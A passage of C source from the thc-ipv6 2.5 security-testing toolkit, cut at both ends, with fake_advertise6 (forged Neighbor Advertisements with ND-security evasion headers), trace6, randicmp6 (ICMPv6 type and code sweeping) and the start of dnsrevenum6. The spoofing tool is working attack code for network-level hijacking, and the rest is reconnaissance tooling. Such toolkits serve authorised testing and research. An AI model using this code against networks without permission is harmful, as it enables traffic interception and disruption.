packet, exiting ...\n"); exit(-1); } while (thc_send_pkt(interface, pkt1, &pkt1_len) < 0) usleep(5); printf("Sent PIM %s message\n", mode == 0 ? "hello" : mode == 1 ? "join" : "prune"); return 0; } thc-ipv6-2.5/fake_advertise6.c0000644000000000000000000001430612251022435014724 0ustar rootroot#include #include #include #include #include #include #include #include #include #include #include "thc-ipv6.h" void help(char *prg) { printf("%s %s (c) 2013 by %s %s\n\n", prg, VERSION, AUTHOR, RESOURCE); printf("Syntax: %s [-DHF] [-Ors] [-n count] [-w seconds] interface ip-address-advertised [target-address [mac-address-advertised [source-ip-address]]]\n\n", prg); printf("Advertise IPv6 address on the network (with own mac if not specified),\n"); printf("sending it to the all-nodes multicast address if no target address is set.\n"); printf("Source ip address is the address advertised if not set.\n\n"); printf("Sending options:\n"); printf(" -n count send how many packets (default: forever)\n"); printf(" -w seconds wait time between the packets sent (default: 5)\n"); printf("Flag options:\n"); printf(" -O do NOT set the override flag (default: on)\n"); printf(" -r DO set the router flag (default: off)\n"); printf(" -s DO set the solicitate flag (default: off)\n"); printf("ND Security evasion options (can be combined):\n"); printf(" -H add a hop-by-hop header\n"); printf(" -F add a one shot fragment header (can be specified multiple times)\n"); printf(" -D add a large destination header which fragments the packet.\n"); exit(-1); } int main(int argc, char *argv[]) { unsigned char *pkt1 = NULL, *pkt2 = NULL, buf[24], buf2[6], buf3[1500]; unsigned char *unicast6, *src6 = NULL, *dst6 = NULL, srcmac[16] = "", *mac = srcmac; int pkt1_len = 0, pkt2_len = 0, prefer = PREFER_GLOBAL, i, do_hop = 0, do_dst = 0, do_frag = 0, cnt, type = NXT_ICMP6, wait = 5, loop = -1; unsigned int flags = ICMP6_NEIGHBORADV_OVERRIDE; char *interface; int offset = 14; thc_ipv6_hdr *hdr; if (argc < 3 || strncmp(argv[1], "-h", 2) == 0) help(argv[0]); if (getenv("THC_IPV6_PPPOE") != NULL || getenv("THC_IPV6_6IN4") != NULL) printf("WARNING: %s is not working with injection!\n", argv[0]); while ((i = getopt(argc, argv, "DFHOrsn:w:")) >= 0) { switch (i) { case 'n': loop = atoi(optarg); break; case 'w': wait = atoi(optarg); break; case 'O': if ((flags & ICMP6_NEIGHBORADV_OVERRIDE) > 0) flags -= ICMP6_NEIGHBORADV_OVERRIDE; break; case 'r': flags = (flags | ICMP6_NEIGHBORADV_ROUTER); break; case 's': flags = (flags | ICMP6_NEIGHBORADV_SOLICIT); break; case 'F': do_frag++; break; case 'H': do_hop = 1; break; case 'D': do_dst = 1; break; default: fprintf(stderr, "Error: invalid option %c\n", i); exit(-1); } } if (argc - optind < 2) help(argv[0]); if (do_hdr_size) offset = do_hdr_size; interface = argv[optind]; if (thc_get_own_mac(interface) == NULL) { fprintf(stderr, "Error: invalid interface %s\n", interface); exit(-1); } if ((unicast6 = thc_resolve6(argv[optind + 1])) == NULL) { fprintf(stderr, "Error: %s does not resolve to a valid IPv6 address\n", argv[optind + 1]); exit(-1); } if (argc - optind >= 3 && argv[optind + 2] != NULL) dst6 = thc_resolve6(argv[optind + 2]); else dst6 = thc_resolve6("ff02::1"); if (dst6 == NULL) { fprintf(stderr, "Error: could not resolve destination of advertise: %s\n", argv[optind + 2]); exit(-1); } if (argc - optind >= 4 && argv[optind + 3] != NULL) sscanf(argv[optind + 3], "%x:%x:%x:%x:%x:%x", (unsigned int *) &srcmac[0], (unsigned int *) &srcmac[1], (unsigned int *) &srcmac[2], (unsigned int *) &srcmac[3], (unsigned int *) &srcmac[4], (unsigned int *) &srcmac[5]); else mac = thc_get_own_mac(interface); if (argc - optind >= 5 && argv[optind + 4] != NULL) src6 = thc_resolve6(argv[optind + 4]); else src6 = unicast6; memset(buf, 0, sizeof(buf)); memcpy(buf, unicast6, 16); buf[16] = 2; buf[17] = 1; memcpy(&buf[18], mac, 6); memset(buf2, 0, sizeof(buf2)); memset(buf3, 0, sizeof(buf3)); if ((pkt1 = thc_create_ipv6_extended(interface, prefer, &pkt1_len, src6, dst6, 0, 0, 0, 0, 0)) == NULL) return -1; if (do_hop) { type = NXT_HBH; if (thc_add_hdr_hopbyhop(pkt1, &pkt1_len, buf2, sizeof(buf2)) < 0) return -1; } if (do_frag) { if (type == NXT_ICMP6) type = NXT_FRAG; for (i = 0; i <= do_frag; i++) if (thc_add_hdr_oneshotfragment(pkt1, &pkt1_len, cnt++) < 0) return -1; } if (do_dst) { if (type == NXT_ICMP6) type = NXT_DST; if (thc_add_hdr_dst(pkt1, &pkt1_len, buf3, sizeof(buf3)) < 0) return -1; } if (thc_add_icmp6(pkt1, &pkt1_len, ICMP6_NEIGHBORADV, 0, flags, (unsigned char *) &buf, 24, 0) < 0) return -1; if (thc_generate_pkt(interface, mac, NULL, pkt1, &pkt1_len) < 0) { fprintf(stderr, "Error: Can not generate packet, exiting ...\n"); exit(-1); } if ((pkt2 = thc_create_ipv6_extended(interface, prefer, &pkt2_len, src6, dst6, 0, 0, 0, 0, 0)) == NULL) return -1; if (do_hop) if (thc_add_hdr_hopbyhop(pkt2, &pkt2_len, buf2, sizeof(buf2)) < 0) return -1; if (do_frag) for (i = 0; i <= do_frag; i++) if (thc_add_hdr_oneshotfragment(pkt2, &pkt2_len, cnt++) < 0) return -1; if (do_dst) if (thc_add_hdr_hopbyhop(pkt2, &pkt2_len, buf3, sizeof(buf3)) < 0) return -1; if (thc_add_icmp6(pkt2, &pkt2_len, ICMP6_NEIGHBORADV, 0, 0, (unsigned char *) &buf, 24, 0) < 0) return -1; if (thc_generate_pkt(interface, mac, NULL, pkt2, &pkt2_len) < 0) { fprintf(stderr, "Error: Can not generate packet, exiting ...\n"); exit(-1); } printf("Starting advertisement of %s (Press Control-C to end)\n", argv[optind + 1]); while (loop) { if (do_dst) { hdr = (thc_ipv6_hdr *) pkt1; thc_send_as_fragment6(interface, src6, dst6, type, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, 1240); hdr = (thc_ipv6_hdr *) pkt2; thc_send_as_fragment6(interface, src6, dst6, type, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, 1240); } else { thc_send_pkt(interface, pkt1, &pkt1_len); thc_send_pkt(interface, pkt2, &pkt2_len); } if (loop != -1) loop--; if (loop) sleep(wait); } return 0; } thc-ipv6-2.5/trace6.c0000644000000000000000000004531412251022441013046 0ustar rootroot#include #include #include #include #include #include #include #include #include #include #include #include "thc-ipv6.h" #define MAX_SEND 15 #define INCREASE 8 #define SENDS 3 #define POS_SIZE ((SENDS * MAX_SEND) + 2) unsigned char *position[POS_SIZE]; unsigned char *remark[POS_SIZE]; unsigned int rmtu[POS_SIZE]; unsigned char buf2[4]; unsigned short int baseport = 1200; unsigned int pid = 0; unsigned int mtu = 0; unsigned int orig_mtu = 0; int udp = 0, offset = 48, buf_len = 16, tunnel = 0, do_alert = 0, do_reply = 0, do_toobig = 0, do_frag = 0, do_dst = 0, do_dst2 = 0; int up_to = MAX_SEND, complete = 0, type = 0, rawmode = 0, finaldst = 0; void help(char *prg) { printf("%s %s (c) 2013 by %s %s\n\n", prg, VERSION, AUTHOR, RESOURCE); printf("Syntax: %s [-abdtu] [-s src6] interface targetaddress [port]\n\n", prg); printf("Options:\n"); printf(" -a insert a hop-by-hop header with router alert option.\n"); printf(" -D insert a destination extension header\n"); printf(" -E insert a destination extension header with an invalid option\n"); printf(" -F insert a one-shot fragmentation header\n"); printf(" -b instead of an ICMP6 Ping, use TooBig (you will not see the target)\n"); printf(" -B instead of an ICMP6 Ping, use PingReply (you will not see the target)\n"); printf(" -d resolves the IPv6 addresses to DNS.\n"); printf(" -t enables tunnel detection\n"); printf(" -u use UDP instead of TCP if a port is supplied\n"); printf(" -s src6 specifies the source IPv6 address\n"); printf("Maximum hop reach: %d\n\n", INCREASE * (SENDS - 1) + MAX_SEND); printf("A basic but very fast traceroute6 program.\n"); printf("If no port is specified, ICMP6 Ping requests are used, otherwise TCP SYN\n"); printf("packets to the specified port. Options D, E and F can be use multiple times.\n"); exit(-1); } void check_packets(u_char *foo, const struct pcap_pkthdr *header, const unsigned char *data) { int i, ok = 0, len = header->caplen, add, add2; unsigned char *ptr = (unsigned char *) data, *ptr2; unsigned short int *si; unsigned int *ui, new_mtu = 0; unsigned char pos = 0, pos2; if (!rawmode) { ptr += 14; len -= 14; } if (do_hdr_size) { ptr += (do_hdr_size - 14); len -= (do_hdr_size - 14); if ((ptr[0] & 240) != 0x60) return; } add = do_alert + do_frag + do_dst; add2 = do_alert + do_dst; if (debug) thc_dump_data(ptr, len, "Received Packet"); complete = 0; if (tunnel && ptr[6] == NXT_ICMP6 && ptr[40] == ICMP6_TOOBIG && len >= 100) { new_mtu = (ptr[44] << 24) + (ptr[45] << 16) + (ptr[46] << 8) + ptr[47]; if (new_mtu < mtu) { if (type != 2) { pos = ptr[94 + 8 * (add)]; pos2 = ptr[93 + 8 * (add)]; if (pos != pos2 || pos > up_to) { pos = ptr[94 + 8 * (add2)]; pos2 = ptr[93 + 8 * (add2)]; } } else { pos = ptr[101 + 0x30 + 8 * (add + do_toobig - 1)]; pos2 = ptr[100 + 0x30 + 8 * (add + do_toobig - 1)]; } if (pos == pos2 && pos <= up_to) { rmtu[pos - 1] = new_mtu; mtu = new_mtu; buf_len = mtu - offset; } } } if (type != 1) { if (ptr[6] != NXT_ICMP6) return; if (ptr[40] == ICMP6_PINGREPLY) { ptr2 = ptr + 48; if (memcmp(ptr + 48, buf2, 4) != 0) // from a different process? return; pos = ptr[46]; if (position[pos] != NULL && pos <= up_to && pos == ptr[45]) { if (position[pos] != NULL) { position[pos] = thc_ipv62notation(ptr + 8); remark[pos] = strdup("\t[ping reply received]"); } position[pos + 1] = NULL; finaldst = 1; } } else { // now for the error icmp types if (type == 0) ptr2 = ptr + 96 + 8 * (add); else ptr2 = ptr + 104 + 0x30 + 8 * (add); if (memcmp(ptr2, buf2, 4) != 0) // from a different process? return; if (ptr[40] == ICMP6_TTLEXEED && ptr[41] == 0 && len >= 100) { if (type == 0) { pos = ptr[94 + 8 * (add)]; pos2 = ptr[93 + 8 * (add)]; if (pos != pos2 || pos > up_to) { pos = ptr[94 + 8 * (add2)]; pos2 = ptr[93 + 8 * (add2)]; } //printf("Exceed from %s\n", thc_ipv62notation(ptr + 8)); //printf(" POS1 is : 94 + 8*(add) = [%d] <= %d ?\n", pos, up_to); //printf(" POS2 is : 93 + 8*(add) = [%d] <= %d ?\n", pos2, up_to); } else { pos = ptr[101 + 0x30 + 8 * (add + do_toobig - 1)]; pos2 = ptr[100 + 0x30 + 8 * (add + do_toobig - 1)]; } //printf("%d == %d < %d\n", pos, pos2, up_to); if (pos == pos2 && pos <= up_to) position[pos] = thc_ipv62notation(ptr + 8); } if (ptr[40] == ICMP6_UNREACH) { if (type == 0) { pos = ptr[94 + 8 * (add)]; pos2 = ptr[93 + 8 * (add)]; if (pos != pos2 || pos > up_to) { pos = ptr[94 + 8 * (add2)]; pos2 = ptr[93 + 8 * (add2)]; } } else { pos = ptr[101 + 0x30 + 8 * (add + do_toobig - 1)]; pos2 = ptr[100 + 0x30 + 8 * (add + do_toobig - 1)]; } if (pos == pos2 && pos <= up_to) { if (position[pos] != NULL) { position[pos] = thc_ipv62notation(ptr + 8); remark[pos] = strdup("\t[unreachable message received]"); } // if (position[pos + 1][0] == '?') position[pos + 1] = NULL; } } if (do_dst2 == 1 && ptr[40] == ICMP6_PARAMPROB) { if (type == 0) { pos = ptr[94 + 8 * (add)]; pos2 = ptr[93 + 8 * (add)]; if (pos != pos2 || pos > up_to) { pos = ptr[94 + 8 * (add2)]; pos2 = ptr[93 + 8 * (add2)]; } } else { pos = ptr[101 + 0x30 + 8 * (add + do_toobig - 1)]; pos2 = ptr[100 + 0x30 + 8 * (add + do_toobig - 1)]; } //thc_dump_data(ptr, len, "pkt"); //printf("type: %d, pos %d, pos2 %d\n", type, pos, pos2); if (pos == pos2 && pos <= up_to) { if (position[pos] != NULL) { position[pos] = thc_ipv62notation(ptr + 8); remark[pos] = strdup("\t[parameter problem received]"); } // if (position[pos + 1][0] == '?') position[pos + 1] = NULL; finaldst = 1; } } } } else { if (ptr[6] != NXT_ICMP6 && ((udp == 0 && ptr[6] != NXT_TCP) || (udp == 1 && ptr[6] != NXT_UDP))) return; if (ptr[6] == NXT_TCP) { si = (unsigned short int *) &ptr[42]; pos = htons((*si % 65536)) - baseport; ui = (unsigned int *) &ptr[48]; if ((pid + 1) != htonl(*ui)) return; if (position[pos] != NULL && pos <= up_to) { position[pos] = thc_ipv62notation(ptr + 8); i = ptr[53] & 6; switch (i) { case 2: remark[pos] = strdup("\t[TCP SYN-ACK reply received]"); break; case 4: remark[pos] = strdup("\t[TCP RST reply received]"); break; default: remark[pos] = strdup("\t[TCP unknown reply received]"); } position[pos + 1] = NULL; finaldst = 1; } } if (ptr[6] == NXT_UDP) { si = (unsigned short int *) &ptr[42]; pos = htons((*si % 65536)) - baseport; if (position[pos] != NULL && pos <= up_to) { position[pos] = thc_ipv62notation(ptr + 8); remark[pos] = strdup("\t[UDP reply received]"); position[pos + 1] = NULL; finaldst = 1; } } if (ptr[6] == NXT_ICMP6 && ptr[40] == ICMP6_TTLEXEED && ptr[41] == 0 && len >= 100) { si = (unsigned short int *) &ptr[88 + 8 * (add)]; ui = (unsigned int *) &ptr[92 + 8 * (add)]; pos = htons((*si % 65536)) - baseport; if (pid != htonl(*ui)) return; if (pos <= up_to) position[pos] = thc_ipv62notation(ptr + 8); } if (ptr[6] == NXT_ICMP6 && ptr[40] == ICMP6_UNREACH && len >= 100) { si = (unsigned short int *) &ptr[88 + 8 * (add)]; ui = (unsigned int *) &ptr[92 + 8 * (add)]; pos = htons((*si % 65536)) - baseport; if (pid != htonl(*ui)) return; if (pos <= up_to) { if (position[pos] != NULL) { position[pos] = thc_ipv62notation(ptr + 8); if (udp && ptr[41] == 4) { remark[pos] = strdup("\t[port unreachable message received]"); position[pos + 1] = NULL; finaldst = 1; } else remark[pos] = strdup("\t[unreachable message received]"); } //if (position[pos + 1][0] == '?') position[pos + 1] = NULL; } } } for (i = 1; i <= up_to && position[i] != NULL; i++) { if (position[i][0] != '?') ok++; if (position[ok + 1] == NULL) complete = 1; } } int main(int argc, char *argv[]) { unsigned char *pkt = NULL, *pkt2 = NULL, foomac[6]; unsigned char *dst6, *src6 = NULL, foo6[16], *mac = NULL, string[64] = "ip6 and dst "; int pkt_len = 0, pkt2_len = 0, prefer = PREFER_GLOBAL, i, k, m, dport = 0, resolve = 0, notreached = 0; unsigned int j; struct hostent *he; unsigned char *interface, *srcmac, buf[2560], dummy[4] = "???", text[120], buf3[6]; time_t passed; pcap_t *p; thc_ipv6_hdr *ipv6; if (argc < 3 || strncmp(argv[1], "-h", 2) == 0) help(argv[0]); while ((i = getopt(argc, argv, "abBdtrus:FDEX")) >= 0) { switch (i) { case 'd': resolve = 1; break; case 'X': debug = 1; break; case 'a': do_alert = 1; break; case 'b': do_toobig++; type = 2; break; case 'B': do_reply++; type = 2; break; case 'r': thc_ipv6_rawmode(1); rawmode = 1; break; case 't': tunnel = 1; break; case 'u': udp = 1; break; case 's': src6 = thc_resolve6(optarg); break; case 'F': do_frag++; break; case 'E': do_dst++; do_dst2 = 1; break; case 'D': do_dst++; break; default: fprintf(stderr, "Error: invalid option %c\n", i); exit(-1); } } if (argc - optind < 2) help(argv[0]); setvbuf(stdout, NULL, _IONBF, 0); setvbuf(stderr, NULL, _IONBF, 0); interface = argv[optind]; if ((dst6 = thc_resolve6(argv[optind + 1])) == NULL) { fprintf(stderr, "Error: can not resolve %s\n", argv[optind + 1]); exit(-1); } if (src6 == NULL) src6 = thc_get_own_ipv6(interface, dst6, prefer); srcmac = thc_get_own_mac(interface); up_to = MAX_SEND; if (do_reply) do_toobig = 0; if (argc - optind >= 3 && argv[optind + 2] != NULL) { if (type) { fprintf(stderr, "Error: you can not use option -b and specify a target TCP port together\n"); exit(-1); } type = 1; dport = atoi(argv[optind + 2]); if (dport < 0 || dport > 65535) { fprintf(stderr, "Error: port (3rd option) is invalid: %s\n", argv[optind + 2]); exit(-1); } } if (src6 == NULL || srcmac == NULL) { fprintf(stderr, "Error: interface not valid: %s!\n", interface); exit(-1); } if (rawmode == 0 && (mac = thc_get_mac(interface, src6, dst6)) == NULL) { fprintf(stderr, "ERROR: Can not resolve mac address for %s\n", argv[optind + 1]); exit(-1); } strcat(string, thc_ipv62notation(src6)); for (i = 0; i < POS_SIZE; i++) { position[i] = dummy; remark[i] = strdup(""); rmtu[i] = 0; } if ((p = thc_pcap_init(interface, string)) == NULL) { fprintf(stderr, "Error: could not capture on interface %s with string %s\n", interface, string); exit(-1); } if (tunnel) { if (type == 1) offset += 12; if (do_hdr_size) offset += do_hdr_size; if ((mtu = thc_get_mtu(interface)) > sizeof(buf) + offset) buf_len = sizeof(buf) + offset; else buf_len = mtu - offset; if (do_alert) buf_len -= 8; orig_mtu = buf_len + offset; } if (do_alert) { memset(buf3, 0, sizeof(buf3)); buf3[0] = 5; buf3[1] = 2; } while (thc_pcap_check(p, (char *) check_packets, NULL) > 0); if (type == 1) { baseport += getpid() % 60000; pid = (getpid() << 16) + getpid(); if (tunnel == 0) buf_len = 0; } else { buf2[0] = getpid() / 256; buf2[1] = getpid() % 256; buf2[2] = buf[0]; // unitialized, thats fine buf2[3] = buf[1]; // unitialized, thats fine for (m = 0; m < (sizeof(buf) / 4); m++) memcpy(buf + (m * 4), buf2, 4); } for (k = 0; k < SENDS; k++) { if (complete == 0) { for (i = 1; i <= up_to; i++) { if (position[i] != NULL && position[i][0] == '?') { if (type != 1) memset((char *) &j, i % 256, 4); if ((pkt = thc_create_ipv6_extended(interface, prefer, &pkt_len, src6, dst6, i, 0, 0, 0, 0)) == NULL) return -1; if (do_alert) if (thc_add_hdr_hopbyhop(pkt, &pkt_len, buf3, 6) < 0) return -1; if (type != 2) { if (do_frag) for (m = 0; m < do_frag; m++) if (thc_add_hdr_oneshotfragment(pkt, &pkt_len, getpid() + m) < 0) return -1; if (do_dst) { memset(buf3, 0, 6); if (do_dst2) { buf3[0] = NXT_INVALID; buf3[1] = 1; } for (m = 0; m < do_dst; m++) if (thc_add_hdr_dst(pkt, &pkt_len, buf3, 6) < 0) return -1; } } if (type == 0) { if (thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, j, (unsigned char *) &buf, buf_len, 0) < 0) return -1; } else { if (type == 2) { memset(foomac, 0xff, sizeof(foomac)); memcpy(foo6, src6, 16); m = 1500 - 40 - 8; if (foo6[8]) foo6[8] = 0; else foo6[8] = 1; if ((pkt2 = thc_create_ipv6_extended(interface, 0, &pkt2_len, dst6, foo6, i, 0, 0, 0, 0)) == NULL) return -1; if (thc_add_icmp6(pkt2, &pkt2_len, ICMP6_PINGREQUEST, 0, j, (unsigned char *) &buf, m, 0) < 0) return -1; thc_generate_pkt(interface, foomac, foomac, pkt2, &pkt2_len); ipv6 = (thc_ipv6_hdr *) pkt2; for (m = 0; m < do_toobig + do_frag; m++) if (thc_add_hdr_oneshotfragment(pkt, &pkt_len, getpid()) < 0) return -1; if (do_dst) { memset(buf3, 0, 6); for (m = 0; m < do_dst; m++) if (thc_add_hdr_dst(pkt, &pkt_len, buf3, 6) < 0) return -1; } if (do_hdr_size) m = do_hdr_size; else m = 14; if (do_reply) { if (thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREPLY, 0, 1480, (unsigned char *) ipv6->pkt + m, 1280 - 40 - 8 - 8, 0) < 0) return -1; } else if (thc_add_icmp6(pkt, &pkt_len, ICMP6_TOOBIG, 0, 1480, (unsigned char *) ipv6->pkt + m, 1280 - 40 - 8 - 8, 0) < 0) return -1; pkt2 = thc_destroy_packet(pkt2); } else if (udp) { if (thc_add_udp(pkt, &pkt_len, baseport + i, dport, 0, buf_len > 0 ? buf : NULL, buf_len) < 0) return -1; } else if (thc_add_tcp(pkt, &pkt_len, baseport + i, dport, pid, 0, TCP_SYN, 5760, 0, NULL, 0, buf_len > 0 ? buf : NULL, buf_len) < 0) return -1; } if (thc_generate_and_send_pkt(interface, srcmac, mac, pkt, &pkt_len) < 0) { fprintf(stderr, "Error: Can not send packet, exiting ...\n"); exit(-1); } pkt = thc_destroy_packet(pkt); usleep(1000); } else if (position[i] == NULL) up_to = i - 1; } } passed = time(NULL); while (passed + k >= time(NULL) && complete == 0) thc_pcap_check(p, (char *) check_packets, NULL); if (complete == 0 && finaldst == 0 && k + 1 < SENDS && up_to >= MAX_SEND && position[up_to] != NULL /*&& position[up_to][0] != '?' */ ) { if (debug) printf("DEBUG: increasing range from %d to %d\n", up_to, up_to + INCREASE); up_to += INCREASE; } if (debug) printf("DEBUG: run %d of %d, complete %d, range %d\n", k, SENDS, complete, up_to); } thc_pcap_close(p); j = 0; for (i = 1; i <= up_to && position[i] != NULL; i++) if (position[i][0] == '?') j++; else j = 0; if (j > 0) { up_to -= (j - 1); position[up_to] = strdup("!!!"); notreached = 1; } j = 0; for (i = 1; i <= up_to && position[i] != NULL; i++) if (position[i][0] != '?') j++; if (j == 0) { printf("Trace6 for %s unsuccessful, no packets received.\n", argv[optind + 1]); } else { if (tunnel) { snprintf(text, sizeof(text), " with starting MTU %d", orig_mtu); mtu = orig_mtu; } else text[0] = 0; printf("Trace6 for %s (%s)%s:\n", argv[optind + 1], thc_ipv62notation(dst6), text); j = 0; for (i = 0; i <= up_to; i++) if (position[i] == NULL && j == -1) j = i; if (j > 0) up_to = j; for (i = 1; i <= up_to && position[i] != NULL; i++) { if (tunnel && rmtu[i] > 0 && mtu > rmtu[i]) { if (mtu - rmtu[i] < 8) snprintf(text, sizeof(text), " - new MTU %d", rmtu[i]); else if (mtu - rmtu[i] == 20) snprintf(text, sizeof(text), " - new MTU %d - 6in4 tunnel endpoint", rmtu[i]); else if (mtu - rmtu[i] == 28 || mtu - rmtu[i] == 36 || mtu - rmtu[i] == 8 || mtu - rmtu[i] == 16) snprintf(text, sizeof(text), " - new MTU %d - PPP or Teredo tunnel endpoint", rmtu[i]); else if (mtu - rmtu[i] == 64) snprintf(text, sizeof(text), " - new MTU %d - PPTP tunnel endpoint", rmtu[i]); else if (mtu - rmtu[i] == 80) snprintf(text, sizeof(text), " - new MTU %d - AYIYA tunnel endpoint", rmtu[i]); else if (mtu - rmtu[i] > 80) snprintf(text, sizeof(text), " - new MTU %d", rmtu[i]); else snprintf(text, sizeof(text), " - new MTU %d", rmtu[i]); mtu = rmtu[i]; } else text[0] = 0; if (resolve && position[i][0] != '?' && position[i][0] != '!') { //printf("foo %p\n", position[i]); he = gethostbyaddr(thc_resolve6(position[i]), 16, AF_INET6); printf(" %2d: %s (%s)%s%s\n", i, position[i], he != NULL ? he->h_name : "", remark[i], text); } else printf(" %2d: %s%s%s\n", i, position[i], remark[i], text); } printf("\n"); } if (notreached) { if (do_toobig) printf("With the -b TooBig option, the destination will not send a reply\n"); else printf("The destination seems to be filtered.\n"); } return 0; } thc-ipv6-2.5/randicmp6.c0000644000000000000000000000743612251022440013547 0ustar rootroot#include #include #include #include #include #include #include #include #include #include #include #include "thc-ipv6.h" void check_packet(u_char *foo, const struct pcap_pkthdr *header, const unsigned char *data) { unsigned char *ipv6hdr = (unsigned char *) (data + 14); int len = header->caplen - 14; if (do_hdr_size) { ipv6hdr = (unsigned char *) (data + do_hdr_size); len -= (do_hdr_size - 14); if ((ipv6hdr[0] & 240) != 0x60 || ipv6hdr[6] != NXT_ICMP6 || len < 48) return; } else if (len < 48) return; printf("Received type %d code %d\n", ipv6hdr[40], ipv6hdr[41]); } int main(int argc, char *argv[]) { unsigned char *dst61, *src61 = NULL; unsigned char buf[8]; int pkt_len = 600; char *interface, string[64]; unsigned char *pkt = NULL; unsigned char *srcmac, *dstmac; //can define as null to auto generate int type, code, flags = 0, tf = 0, tt = 255, cf = 0, ct = 255, print = 1; pcap_t *p; setvbuf(stdout, NULL, _IONBF, 0); setvbuf(stderr, NULL, _IONBF, 0); if (argc < 3) { printf("Syntax: %s [-p] [-s sourceip] interface destination [type [code]]\n\n", argv[0]); printf("Sends all ICMPv6 type and code combinations to destination.\n"); printf("Option -s sets the source IPv6 address.\n"); printf("Option -p will not print answers received.\n"); exit(0); } if (strncmp(argv[1], "-p", 2) == 0) { print = 0; argv++; argc--; } if (strncmp(argv[1], "-s", 2) == 0) { src61 = thc_resolve6(argv[2]); argv++; argv++; argc--; argc--; } if (strncmp(argv[1], "-p", 2) == 0) { print = 0; argv++; argc--; } interface = argv[1]; // source and destination IPv6 addresses dst61 = thc_resolve6(argv[2]); if (src61 == NULL) src61 = thc_get_own_ipv6(interface, dst61, PREFER_GLOBAL); if (argc >= 4) tf = tt = atoi(argv[3]); if (argc >= 5) cf = ct = atoi(argv[4]); memset(buf, 0, sizeof(buf)); printf("Sending ICMPv6 Packets to %s%%%s\n", argv[2], argv[1]); srcmac = thc_get_own_mac(interface); dstmac = thc_get_mac(interface, src61, dst61); if (srcmac == NULL) { fprintf(stderr, "Error: illegal interface: %s\n", interface); exit(-1); } if (dstmac == NULL) { fprintf(stderr, "Error: can not resolve target: %s\n", argv[2]); exit(-1); } if (dst61[0] == 0xff) { sprintf(string, "icmp6 and dst %s", thc_ipv62notation(src61)); } else { sprintf(string, "icmp6 and src %s", thc_ipv62notation(dst61)); } if ((p = thc_pcap_init(interface, string)) == NULL) { fprintf(stderr, "Error: could not capture on interface %s with string %s\n", interface, string); exit(-1); } for (type = tf; type <= tt; type++) { printf("Sending ICMPv6 type %d ...\n", type); for (code = cf; code <= ct; code++) { //build the packet if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src61, dst61, 255, 0, 0, 0, 0)) == NULL) printf("Packet Creation Failed\n"); //add icmp part if (thc_add_icmp6(pkt, &pkt_len, type, code, flags, buf, sizeof(buf), 0) < 0) return -1; //generate packet if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) { printf("generate failed\n"); return -1; } // send the packet out if (thc_send_pkt(interface, pkt, &pkt_len) < 0) printf("packet not sent \n"); thc_destroy_packet(pkt); //destroy the packet pkt = NULL; pkt_len = 0; if (print) { usleep(10000); while(thc_pcap_check(p, (char *) check_packet, NULL) > 0); } } } if (print) { sleep(3); while(thc_pcap_check(p, (char *) check_packet, NULL) > 0); } printf("Done!\n"); return 0; } thc-ipv6-2.5/dnsrevenum6.c0000644000000000000000000002337312251022434014141 0ustar rootroot/* * Simple and fast Reverse DNS Enumerator for IPv6 * - detects wildcard DNS servers * - adapts to lossy/slow DNS server * - fast but non-flooding * - specify the reverse domain as 2001:db8::/56 * or 0.0.0.0.8.b.d.0.1.0.0.2.ip6.arpa * * (c) 2013 by Marc "van Hauser" Heuse or * The AGPL v3 license applies to this code. * * Compile: gcc -O2 -o dnsrevenum6 dnsrevenum6.c thc-ipv6-lib.o -lcrypto -lssl -lpcap * */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include "thc-ipv6.h" // do not set below 2 #define WAITTIME_START 2 int sock, len, buf_len, waittime = WAITTIME_START, wait, found = 0; unsigned char range[33], buf_start[12], buf_end[14], buf[512], buf2[1024], name[512], dst6[16], *prg, *dst, cnt = 0; int dnssocket(char *server) { struct addrinfo *ai; struct addrinfo hints; int s; struct timeval tv; tv.tv_sec = 1; /* 1 sec Timeout */ tv.tv_usec = 0; // Not init'ing this can cause strange errors memset(&hints, 0, sizeof(struct addrinfo)); hints.ai_family = AF_UNSPEC; hints.ai_socktype = SOCK_DGRAM; hints.ai_protocol = IPPROTO_UDP; if (getaddrinfo(server, "53", &hints, &ai) != 0) { fprintf(stderr, "Error: unable to resolve dns server %s!\n", server); exit(-1); } if ((s = socket(ai->ai_family, ai->ai_socktype, ai->ai_protocol)) < 0) { fprintf(stderr, "Error: unable to resolve dns server %s!\n", server); exit(-1); } setsockopt(s, SOL_SOCKET, SO_RCVTIMEO, (char *)&tv,sizeof(struct timeval)); if (connect(s, ai->ai_addr, ai->ai_addrlen) < 0) { fprintf(stderr, "Error: unable to connect to dns server %s!\n", server); exit(-1); } freeaddrinfo(ai); return s; } unsigned char tohex(unsigned char c) { if (c < 10) return (c + '0'); else return (c + 'a' - 10); } unsigned char tochar(unsigned char c) { if (c >= '0' && c <= '9') return (c - '0'); else return (tolower(c) - 'a' + 10); } void ignore(int signal) { wait = 0; if (debug) printf("interrupted!\n"); return; } int send_range() { int i; for (i = 0; i < 32; i++) { buf[sizeof(buf_start) + i * 2] = 1; buf[sizeof(buf_start) + i * 2 + 1] = range[31 - i]; } memcpy(buf + sizeof(buf_start) + 64, buf_end, sizeof(buf_end)); buf_len = sizeof(buf_start) + 64 + sizeof(buf_end); buf[0] = 254; buf[1] = cnt++; if (send(sock, buf, buf_len, 0) < 0) { fprintf(stderr, "Error: Can not send to network!\n"); exit(-1); } else usleep(5); alarm(waittime + 1); if ((len = recv(sock, buf2, sizeof(buf2), 0)) > 20) { alarm(0); if ((buf2[3] & 3) == 0 && buf2[7] == 1) return 0; else return 1; } alarm(0); return -1; } int deeper(int depth) { unsigned char r[16], *ptr2; int i, j, ok = 0, rs = 0, len, clen, nlen; if (depth > 31) return -1; memset(r, 0, sizeof(r)); // generate base packet cnt++; buf[1] = cnt; for (i = 0; i < depth; i++) { buf[sizeof(buf_start) + 2 + i * 2] = 1; buf[sizeof(buf_start) + 2 + i * 2 + 1] = range[depth - i - 1]; } memcpy(buf + sizeof(buf_start) + 2 + depth * 2, buf_end, sizeof(buf_end)); buf_len = sizeof(buf_start) + 2 + depth * 2 + sizeof(buf_end); // loop to finish generation and send redo: for (i = 0; i < 16; i++) { if (r[i] == 0) { buf[0] = i; buf[13] = tohex(i); if (send(sock, buf, buf_len, 0) < 0) { fprintf(stderr, "Error: can not send to network!\n"); 